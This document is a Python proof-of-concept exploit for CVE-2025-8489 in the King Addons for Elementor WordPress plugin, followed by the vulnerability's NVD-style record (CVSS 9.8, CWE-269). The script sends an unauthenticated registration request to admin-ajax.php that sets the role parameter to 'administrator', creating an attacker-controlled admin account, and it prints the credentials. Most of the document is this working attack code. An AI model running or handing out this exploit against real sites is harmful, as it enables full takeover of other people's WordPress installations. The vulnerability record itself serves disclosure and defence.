CVE-2025-8489

# CVE-2025-8489 PoC - King Addons for Elementor Privilege Escalation # Affected versions: 24.12.92 to 51.1.14 import requests import sys TARGET_URL = "https://target-site.com" # Replace with target URL def exploit_privilege_escalation(): """ Exploit CVE-2025-8489 by registering an administrator account """ endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Construct malicious registration request # The plugin fails to validate the 'role' parameter properly payload = { 'action': 'king_addons_register_user', 'username': 'hacked_admin', # Attacker-controlled username 'email': '[email protected]', # Attacker-controlled email 'password': 'P@ssw0rd123!', # Attacker-controlled password 'role': 'administrator', # Privilege escalation - requesting admin role 'king_addons_nonce': '' # May be bypassed or missing validation } try: print(f"[*] Sending exploitation request to {TARGET_URL}") response = requests.post(endpoint, data=payload, timeout=30) if response.status_code == 200: result = response.json() if response.headers.get('content-type', '').find('json') != -1 else response.text print(f"[+] Response: {result}") if 'success' in str(result) or response.status_code == 200: print("[+] Administrator account created successfully!") print(f"[+] Login credentials:") print(f" Username: hacked_admin") print(f" Password: P@ssw0rd123!") print(f"[+] Access admin panel at: {TARGET_URL}/wp-admin/") else: print("[-] Exploitation may have failed, check response manually") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": exploit_privilege_escalation()

{"cve": {"id": "CVE-2025-8489", "sourceIdentifier": "[email protected]", "published": "2025-10-31T07:15:38.693", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor plugin for WordPress is vulnerable to privilege escalation in versions 24.12.92 to 51.1.14 . This is due to the plugin not properly restricting the roles that users can register with. This makes it possible for unauthenticated attackers to register with administrator-level user accounts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/king-addons/tags/24.12.93/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L353", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/king-addons/tags/51.1.35/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L160", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1bb2b06-9a3b-4428-8624-26a1202fe3b0?source=cve", "source": "[email protected]"}]}}